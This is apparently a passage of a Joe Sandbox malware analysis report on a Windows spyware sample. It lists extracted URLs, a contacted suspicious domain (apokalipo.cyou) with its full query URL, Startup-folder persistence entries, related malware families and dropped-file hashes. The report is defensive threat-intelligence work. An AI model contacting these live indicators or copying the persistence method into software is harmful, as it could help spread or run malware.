                  http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specificat0%VirustotalBrowse
                  http://virtualbox.org/firmware/VBoxEFI32.fd0%VirustotalBrowse
                  http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History0%VirustotalBrowse
                  http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=00%VirustotalBrowse
                  http://curl.haxx.se/rfc/cookie_spec.html0%VirustotalBrowse
                  https://apokalipo.cyou/0%VirustotalBrowse
                  http://www.softwareok.de0%VirustotalBrowse
                  http://www.vmware.com/schema/ovf/1/envelope0%VirustotalBrowse
                  http://www.vmware.com/interfaces/specifications/vmdk.html#compressed0%VirustotalBrowse
                  http://www.virtualbox.org/ovf/machine0%VirustotalBrowse
                  http://virtualbox.org/firmware/VBoxEFI64.fd0%VirustotalBrowse
                  http://www.vmware.com/0/0%VirustotalBrowse
                  http://www.softwareok.com/?Download=Find.Same.Images.OK0%VirustotalBrowse
                  http://www.softwareok.de/?Download=Find.Same.Images.OK1%VirustotalBrowse
                  http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd0%VirustotalBrowse
                  http://www.info-zip.org/0%VirustotalBrowse
                  http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor0%VirustotalBrowse
                  http://www.innotek.de/VirtualBox-settings0%VirustotalBrowse
                  https://gnu.org/licenses/gpl.html0%VirustotalBrowse
                  http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=00%VirustotalBrowse
                  http://relaxng.org/ns/structure/1.0allocating0%VirustotalBrowse
                  http://www.vmware.com/specifications/vmdk.html#compressed0%VirustotalBrowse
                  https://gnu.org/licenses/0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  apokalipo.cyou
                  		188.114.96.3
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkGfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.openssl.org/support/faq.html....................D:Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpfalseunknown
                      https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.htmleldbZzsLLytC%2FMtKEkDEvalidPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.micKClGcCpDAP.exe, 00000000.00000003.1728770025.000000000135B000.00000004.00000020.00020000.00000000.sdmp, KClGcCpDAP.exe, 00000000.00000002.1729145495.000000000135E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.vmware.com/0Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.softwareok.com/?Freeware/Find.Same.Images.OK/HistoryvalidPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                          https://apokalipo.cyou/2t2validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044B000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLvalidPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D76000.00000004.00001000.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.softwareok.com/?Freeware/Find.Same.Images.OKvalidPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                              http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specificatVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                              http://virtualbox.org/firmware/VBoxEFIDual.fdVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                              http://virtualbox.org/firmware/VBoxEFI32.fdVBoxEFI64.fdhttp://virtualbox.org/firmware/VBoxEFI64.fdVBVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                              http://www.openssl.org/support/faq.htmlVirtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.softwareok.de/?Freeware/Find.Same.Images.OKvalidPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                              https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.htmlvalidPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmpfalse
                                		unknown
                                https://apokalipo.cyou/NvalidPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://virtualbox.org/firmware/VBoxEFI32.fdVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                  http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                                  http://www.softwareok.deVirtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                                  http://www.softwareok.de/?Freeware/Find.Same.Images.OK/HistoryvalidPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                                  https://apokalipo.cyou/validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://www.softwareok.com/?Download=Find.Same.Images.OKvalidPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                                  http://curl.haxx.se/rfc/cookie_spec.htmlVirtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpfalseunknown
                                  http://www.vmware.com/interfaces/specifications/vmdk.html#compressedVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                  http://www.vmware.com/schema/ovf/1/envelopeVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                  http://virtualbox.org/firmware/VBoxEFI64.fdVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                  http://www.softwareok.de/?Download=Find.Same.Images.OKvalidPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                                  http://ocsp.thawte.com0KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.virtualbox.org/ovf/machineVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                  http://www.vmware.com/0/Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpfalseunknown
                                  http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgorKClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpfalseunknown
                                  http://www.???.xx/?search=%sVirtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmpfalse
                                    		unknown
                                    http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtdVirtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpfalseunknown
                                    http://www.symauth.com/cps0(Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://relaxng.org/ns/structure/1.0allocatingVirtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpfalseunknown
                                    http://www.symauth.com/rpa00Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://apokalipo.cyou:443/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZvalidPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000482000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000485000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.innotek.de/VirtualBox-settingsVirtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                      http://www.info-zip.org/Virtual.exe, 00000002.00000002.1722899571.0000000003CFD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003B5A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221794602.00000000025B5000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                      https://gnu.org/licenses/KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpfalseunknown
                                      http://www.vmware.com/specifications/vmdk.html#compressedVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                                      https://gnu.org/licenses/gpl.htmlKClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpfalseunknown
                                      http://relaxng.org/ns/structure/1.0Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpfalse
                                        		unknown
                                        http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimizedVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalse
                                          		unknown
                                          http://www.vmware.com/specifications/vmdk.html#sparseVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalse
                                            		unknown
                                            http://www.surfok.de/validPower_Lnz_x64.exe, 0000000A.00000000.1977816040.0000000140156000.00000002.00000001.01000000.00000017.sdmpfalse
                                              		unknown
                                              http://crl.vvalidPower_Lnz_x64.exe, 0000000A.00000003.2202727575.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2211577219.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219967891.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.softwareok.comVirtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmpfalse
                                                		unknown
                                                http://www.vmware.com/specifications/vmdk.html#sparsehttp://www.vmware.com/interfaces/specificationsVirtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                  		unknown
                                                  http://appsyndication.org/2006/appsynKClGcCpDAP.exefalse
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    188.114.96.3
                                                    		apokalipo.cyouEuropean Union
                                                    		13335CLOUDFLARENETUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1527626
                                                    Start date and time:2024-10-07 07:13:10 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:21
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:KClGcCpDAP.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:61d2baf57c3ed6eda2d72720fc54ed04.exe
                                                    Detection:MAL
                                                    Classification:mal96.spyw.expl.evad.winEXE@22/25@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 112
                                                    • Number of non-executed functions: 273
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    01:14:06API Interceptor1x Sleep call for process: KClGcCpDAP.exe modified
                                                    01:14:38API Interceptor2x Sleep call for process: cmd.exe modified
                                                    01:14:53API Interceptor7x Sleep call for process: validPower_Lnz_x64.exe modified
                                                    06:14:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT7718.tmp
                                                    06:14:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFUUltra.lnk

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    188.114.96.3http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                    • revexhibition.pages.dev/favicon.ico
                                                    http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                    • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                    http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                    • www.tkmall-wholesale.com/
                                                    c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                    • winfileshare.com/ticket_line/llb.php
                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                    1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                    http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                    • asm.alcateia.org/
                                                    hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                    • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.bayarcepat19.click/g48c/

                                                    Domains

                                                    No context

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSCompany Profile.vbsGet hashmaliciousUnknownBrowse
                                                    • 162.159.140.237
                                                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.55.124
                                                    maizu v1.4.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    AimBot.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.178.50
                                                    injcheat.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.206.204
                                                    p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                    • 172.67.206.204

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    maizu v1.4.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    AimBot.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    injcheat.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    setupa.exeGet hashmaliciousGhostRatBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                    • 188.114.96.3
                                                    TVyKPaL2h0.exeGet hashmaliciousAmadeyBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dllorderconfirmation.exeGet hashmaliciousLummaCBrowse
                                                      C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe46L03o2EOY.exeGet hashmaliciousUnknownBrowse
                                                        46L03o2EOY.exeGet hashmaliciousUnknownBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\106dbf4d

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5537870
                                                          Entropy (8bit):7.692584840450482
                                                          Encrypted:false
                                                          SSDEEP:98304:QHevOfbm1blCTylnpvLG66RbQ/j70Z79EeBavpi7A6JBYA4cfunYkKpRO/:oe6qrnhG6N/j7WTYQs6JBTpf/fg
                                                          MD5:A05D34B4AF9019924CC181D9F0C99133
                                                          SHA1:B8518F765711A9D715FBBA3615E210C5B98434CA
                                                          SHA-256:1B97E2882218CC463E27F11517025353C5881D90C8E5E55EA1ECC6B992BA016D
                                                          SHA-512:A3BB7BDA948633D6B006BC5252FAF5E3884BF38D75470877CFF37938BF6D3620264BB491B8AAA6FAA89731F9D701389FCEBFC0AA4826454FA24A82D1EC174A99
                                                          Malicious:false
                                                          Preview:..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..*{..{+...:..f...D..._'..E...X'..J..f...w+..L...X'..J...[{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..b...B...Q...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..h..._...X...H...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..b5..y^..B...X....5..w=..F...Y...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..K...L..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{

                                                          C:\Users\user\AppData\Local\Temp\1709cbe3

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          File Type:data
